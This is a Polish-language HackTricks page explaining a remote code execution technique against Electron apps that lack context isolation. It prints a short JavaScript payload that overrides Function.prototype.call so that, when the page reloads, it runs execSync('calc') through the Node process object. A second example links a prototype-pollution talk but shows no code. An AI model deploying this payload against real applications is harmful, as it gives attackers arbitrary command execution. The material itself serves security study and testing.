Electron contextIsolation RCE via Electron internal code

Nauka hakowania AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Czy pracujesz w firmie z branży cyberbezpieczeństwa? Chcesz zobaczyć swoją firmę reklamowaną na HackTricks? lub chcesz mieć dostęp do najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF? Sprawdź PLANY SUBSKRYPCYJNE!
Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
Zdobądź oficjalne gadżety PEASS & HackTricks
Dołącz do 💬 grupy Discord lub grupy telegramowej albo śledź mnie na Twitterze 🐦@carlospolopm.
Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do repozytorium hacktricks i repozytorium hacktricks-cloud.

Przykład 1

Przykład z https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41

Słuchacz zdarzenia "exit" jest zawsze ustawiany przez wewnętrzny kod, gdy rozpoczyna się ładowanie strony. To zdarzenie jest emitowane tuż przed nawigacją:

process.on('exit', function (){
for (let p in cachedArchives) {
if (!hasProp.call(cachedArchives, p)) continue
cachedArchives[p].destroy()
}
})

electron/asar.js at 664c184fcb98bb5b4b6b569553e7f7339d3ba4c5 · electron/electronGitHub

https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- Już nie istnieje

Następnie przechodzi tutaj:

Gdzie "self" to obiekt procesu Node'a:

Obiekt procesu ma odwołania do funkcji "require":

process.mainModule.require

Jako handler.call otrzyma obiekt procesu, możemy go nadpisać, aby wykonać dowolny kod:

<script>
Function.prototype.call = function(process){
process.mainModule.require('child_process').execSync('calc');
}
location.reload();//Trigger the "exit" event
</script>

Przykład 2

Uzyskaj obiekt require z zanieczyszczenia prototypu. Z https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81

Leak:

Exploit:

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Czy pracujesz w firmie zajmującej się cyberbezpieczeństwem? Chcesz zobaczyć, jak Twoja firma jest reklamowana w HackTricks? lub chcesz mieć dostęp do najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF? Sprawdź PLANY SUBSKRYPCYJNE!
Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
Zdobądź oficjalne gadżety PEASS & HackTricks
Dołącz do 💬 grupy Discord lub grupy telegramowej albo śledź mnie na Twitterze 🐦@carlospolopm.
Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do repozytorium hacktricks i repozytorium hacktricks-cloud.

PreviousElectron contextIsolation RCE via preload code NextElectron contextIsolation RCE via IPC

Last updated 3 days ago